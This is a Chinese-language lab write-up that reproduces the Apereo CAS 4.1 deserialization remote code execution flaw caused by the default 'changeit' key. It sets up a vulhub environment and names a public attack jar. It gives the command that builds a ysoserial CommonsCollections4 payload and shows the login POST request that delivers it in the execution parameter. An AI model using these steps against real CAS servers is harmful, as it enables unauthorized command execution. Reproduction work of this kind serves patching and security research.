漏洞概述
Apereo CAS是一款Apereo发布的集中认证服务平台,常被用于企业内部单点登录系统。其4.1.7版本之前存在一处默认密钥的问题,利用这个默认密钥我们可以构造恶意信息触发目标反序列化漏洞,进而执行任意命令。
影响版本
Apereo CAS <= 4.1.7
环境搭建
这里我使用vulhub来安装环境
进入目录并安装
启动一个Apereo CAS 4.1.5:
cd vulhub-master/apereo-cas/4.1-rce/
docker-compose up -d
访问http://your-ip:8080/cas/login即可查看到登录页面。
漏洞检测
该漏洞存在于登录的execution参数,使用Burp抓包可以发现该参数值。
漏洞复现
漏洞原理实际上是Webflow中使用了默认密钥changeit:
public class EncryptedTranscoder implements Transcoder {
private CipherBean cipherBean;
private boolean compression = true;
public EncryptedTranscoder() throws IOException {
BufferedBlockCipherBean bufferedBlockCipherBean = new BufferedBlockCipherBean();
bufferedBlockCipherBean.setBlockCipherSpec(new BufferedBlockCipherSpec("AES", "CBC", "PKCS7"));
bufferedBlockCipherBean.setKeyStore(this.createAndPrepareKeyStore());
bufferedBlockCipherBean.setKeyAlias("aes128");
bufferedBlockCipherBean.setKeyPassword("changeit");
bufferedBlockCipherBean.setNonce(new RBGNonce());
this.setCipherBean(bufferedBlockCipherBean);
}
// ...
我们使用Apereo-CAS-Attack来复现这个漏洞
下载地址
https://github.com/vulhub/Apereo-CAS-Attack/releases/download/v1.0.0/apereo-cas-attack-1.0-SNAPSHOT-all.jar
使用ysoserial的CommonsCollections4生成加密后的Payload:
java -jar apereo-cas-attack-1.0-SNAPSHOT-all.jar CommonsCollections4 "touch /tmp/success"
然后我们登录CAS并抓包,将Body中的execution值替换成上面生成的Payload发送:
POST /cas/login HTTP/1.1
Host: 192.168.204.131:8080
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 2289
Origin: http://192.168.204.131:8080
Connection: close
Referer: http://192.168.204.131:8080/cas/login;jsessionid=0CF8D0EDB4319FAE331C7D10BE3E0864
Cookie: JSESSIONID=0CF8D0EDB4319FAE331C7D10BE3E0864
Upgrade-Insecure-Requests: 1
username=asddas&password=asdasd<=LT-7-U74mB7leoY1FdormOR5oGe59Z5I4ng-cas01.example.org&execution=[payload]&_eventId=submit&submit=LOGIN
登录docker,可见touch /tmp/success已成功执行:
修复建议
升级到最新版
本文始发于微信公众号(锋刃科技):Apereo CAS 4.1 反序列化命令执行漏洞复现
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论